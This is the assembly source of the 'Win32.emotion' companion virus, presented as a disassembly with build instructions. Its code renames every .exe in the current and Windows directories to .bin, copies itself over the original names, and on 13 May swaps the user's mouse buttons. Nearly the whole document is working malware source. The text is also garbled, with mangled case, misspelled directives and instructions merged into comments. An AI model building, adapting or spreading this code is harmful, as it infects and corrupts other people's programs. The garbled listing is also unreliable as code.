Win32.emotion.asm


Comment *

Win32.emotion -- Disassembly by DARKMAN / 29A
[The ASCII-art banner that framed this line was lost to character mis-encoding and is not reconstructed here.]

Win32.emotion is a 4608-byte direct-action companion virus for Win32 executables. When run, it
targets every *.exe in the current directory and then in the Windows directory: the original
.exe is renamed to a .bin file with the same base name (MoveFileA) and the virus image is
copied over the original .exe name (CopyFileA). An infected .exe therefore runs the virus,
which rewrites its own command line to the .bin name and launches the renamed host via WinExec.
On 13 May the code first shows a message box and calls SwapMouseButton(TRUE), swapping the
mouse buttons system-wide.

Compile Win32.emotion with Turbo Assembler V 5.0 by Typing:

Tasm32 / m / ml emotion.asm

TLINK32-TPE -X -AA EMOTION.OBJ,, IMPORT32

Vgalign Emotion.exe

Pewrsec emotion.exe

*

Jumps

Locals

.386

.MODEL FLAT

Kernel32.dll

EXTRN EXITPROCESS: PROC

EXTRN GETMODULEHANDLEA: PROC

EXTRN FINDNEXTFILEA: PROC

EXTRN GETCOMMANDLINEA: PROC

EXTRN FINDFIRSTFILEA: PROC

EXTRN COPYFILEA: PROC

EXTRN GETSYSTEMTIME: Proc

EXTRN GETWINDOWSDIRECTORYA: PROC

EXTRN MOVEFILEA: PROC

EXTRN SETCURRENTDIRECTORYA: PROC

EXTRN WINEXEC: PROC

EXTRN GETMODULEFILENAMEA: PROC

User32.dll

EXTRN SWAPMOUSEBUTTON: PROC

EXTRN Messageboxa: Proc

.DATA

Max_path EQU 104H

Null EQU 00H

True EQU 01H

MB_ICONHAND EQU 10h; A Stop-Sign Icon APPEARS IN THE

; Message Box

SW_SHOWNORMAL EQU 01H; Activates and Displays A Window

INVALID_HANDLE_VALUE EQU -01H

False Equ 00H

SystemTime Struct

Wyear Word?; Specifies the Current Year

WMONTH WORD MONTH; Specifier the Current Month;

; January = 1, February = 2, And So Onwdayofweek Word?; Specifies The Current Day of The

WEEK

WDAY WORD?; Specifier the Current Day of the

Month

WHOR WORD?; Specifier the Current Hour

Wminute Word?; Specifies the Current Minute

WSecond Word?; Specifies The Current Second

WMILLISECONDS WORDS; Specifies The Current MilliseCond

ENDS

Filetime Struct

DWLOWDATETIME DWORD?; Specifies The Low-Order 32 BITS OF

; the file time

DWHIGHDATETIME DWORD?; Specifies the High-Order 32 Bits of

; the file time

Filetime Ends

Win32_find_data struct

DWFileAttributes DWORD?; Specifies the file attributes of there

File Found

FtcreationTime FileTime <>; specifies the time the file was

CREATED

FTLASTACCESSTIME FileTime <>; Specifies the Time That The File WAS

Last Accessed

FTLASTWRITETIME FileTime <>; specifies the time That the File WAS

Last Written TO

NFILESIZEHIGH DWORD?; Specifies the High-Order DWord Value

; of the file size, in Bytes

NFILESZELOW DWORD?; Specifier the low-Order DWord Value

; of the file size, in Bytes

DWRESERVED0 DWORD?; Reserved for Future Use

DWRESERVED1 DWORD?; Reserved for Future Use

CFILENAME BYTE MAX_PATH DUP (?)

A null-terminated string That Is The

Name of the file

Calternate Byte 0EH DUP (?); a null-terminated string That is an

ALTERNATIVE NAME for the File

ENDS

DB?

.code

Code_begin:

Push Null; Get Module Handle of Kernel32.dllcall getModuleHandlea

Push max_path; size of buffer, in character

Push Offset CFileName; Pointer to Buffer for Module Path

Push Eax; Handle to Module To Find FileName

; For

Call getModuleFileNamea

JMP _FindFirstFilea

_GetWindowsDirectorya:

Push max_path; size of directory buffer

Push Offset CBuffer; Address of Buffer for Windows

Directory

Call GetWindowsDirectorya

Push Offset Szcurdir; Address of Name of New Current

Directory

Call setCurrentDirectorya

MOV [set_current_directory], TRUE

JMP _FindFirstFilea

_GetCommandlinea:

Call getcommandlinea

Mov ESI, ESI ESI = Pointer to THE Command-Line

; String for the current process

Lea Edi, Szcmdline; EDI = Pointer to Szcmdline

Move_commandline_loop:

StoSB; Store A Byte of Command-Line

Lodsb; al = a byte of command-line

OR Al, Al; End of Command-Line?

JNZ MOVE_COMMANDLINE_LOOP; NOT ZERO? JUMP TO

Move_commandline_loop

MOV EAX, '.'; DOT

Lea Edi, Szcmdline; EDI = Pointer to Szcmdline

MOV ECX, Max_Path; ECX = Size of Directory Buffer

Repne scaSB; Find the dot in the filename

MOV DWORD PTR [EDI], 'NIB'; Change The Extens Of The FileName

t .bin

MOV Word PTR [Szcmdline], ''

Push Offset SystemTime; Address of System Time Structure

Call getSystemTime

CMP Byte Ptr [SystemTime.wmonth], 05H

JNE _WINEXEC; May? Jump to _winexecmp byte PTR [SystemTime.wday], 0DH

JNE _WINEXEC; 13th of May? Jump to _winexec

Push MB_ICONHAND; A Stop-Sign Icon APPEARS IN THE

; Message Box

Push Offset Szcaption; Address of Title of Message Box

Push Offset Sztext; Address of Text In Message Box

Push Null; Message Box Has No Owner Window

Call Messageboxa

Push True; Reverse Buttons

Call swapmousebutton

_Winexec:

Push sw_shownormal; activates and displays a window

Push Offset Szcmdline; Address of Command-Line

Call Winexec

Push 00h; EXIT CODE for All Threads

Call EXITPROCESS

_Findfirstfilea:

Push Offset FindFileData; Address of Returned Information

Push Offset SzFileName; Address of Name of File to Search

; For

Call FindfirstFilea

CMP EAX, INVALID_HANDLE_VALUE

JE FUNCTION_FAILED; function failed? Jump to

Function_failed

Lea Edi, FindfileData; EDI = Pointer to FindFileData

Lea ESI, [EDI CFILENAME-WIN32_FIND_DATA]

Push Eax; Eax = Search Handle

JMP Move_FileName

_FindNextFilea:

Push EDI; EDI = Pointer to FindFileData

Lea EDI, [EDI CFileName-Win32_Find_Data]

Mov ECX, 0DH; Store Thirteen Zeros

XOR Al, Al; ZERO AL

Rep Stosb; Store Zero

Lea Edi, SznewFileName; EDI = Pointer to SznewFileName

Mov ECX, 0DH; Store Thirteen Zeros

XOR Al, Al; ZERO AL

Rep Stosb; Store Zeropop Edi; EDI = Pointer to FindfileData

POP Eax; Eax = Search Handle

Push Eax; Eax = Search Handle

Push EDI; Address of Structure for Data on

Found file

Push Eax; Handle of Search

Call FindnextFilea

OR EAX, EAX; FUNCTION FAILED?

JZ Function_Failed; ZERO? Jump to Function_Failed

Lea Edi, FindfileData; EDI = Pointer to FindFileData

Lea ESI, [EDI CFILENAME-WIN32_FIND_DATA]

JMP Move_FileName

Function_failed:

CMP [SET_CURRENT_DIRECTORY], TRUE

JE _GETCOMMANDLINEA; Equal? ​​Jump to _Getcommandlinea

JMP _GetWindowsDirectorya

Move_filename:

Push EDI; EDI = Pointer to FindFileData

Lea Si, [EDI CFILENAME-WIN32_FIND_DATA]

Lea Edi, SznewFileName; EDI = Pointer to SznewFileName

Move_filename_loop:

Lodsb; al = a byte of command-line

StoSB; Store A Byte of Command-Line

OR Al, Al; End of Command-Line?

JNZ Move_FileName_Loop; Not Zero? Jump to Move_FileName_LOOP

XOR Eax, Eax; Zero EAX

Lea Edi, SznewFileName; EDI = Pointer to SznewFileName

MOV ECX, 41H; Search THROUGH SIXTY-FIVE Characters

Repne scaSB; Find end of filename

MOV DWORD PTR [EDI-04H], 'NIB'

POP EDI; EDI = Pointer to FindFileData

Push Offset SznewFileName; Address of New Name for the file

Lea Eax, [EDI CFILENAME-WIN32_FIND_DATA] Push Eax; Address of Name of the EXISTING FILE

Call Movefilea

Push false; if file already exists, Overwrite IT

Lea Eax, [EDI CFILENAME-WIN32_FIND_DATA]

Push Eax; Address of FileName to Copy To

Lea Eax, SzexistingFileName; Eax = Pointer to SzexistingFileName

Push Eax; Address of Name of an existing file

Call Copyfilea

JMP _FindNextFilea

Code_end:

SZFileName DB '* .exe', 00H; Name of File to Search for

SZCAPTION DB 'W32.EMOTION - by: Techno PHUNK [TI]', 00H

Sztext db 'a pool of emotions, beaten and abused.', 0DH, 0AH

DB 'WHO WILL SWIM IN THE Store Waters? Not a one', 0DH, 0AH

DB 'But Many Will Scoff and Destroy this pool with apathy', 00H

Szcurdir:

CBuffer DB MAX_PATH DUP (00h)

; Buffer for Windows Directory

SZNewFileName DB MAX_PATH DUP (00h)

New name for the file

SzexistingFileName:

Szcmdline:

CFileName DB MAX_PATH DUP (00h)

Buffer for module path

SystemTime SystemTime <>

SET_CURRENT_DIRECTORY DB FALSE

FindFileData Win32_Find_Data <>

Data_end:

End code_begin

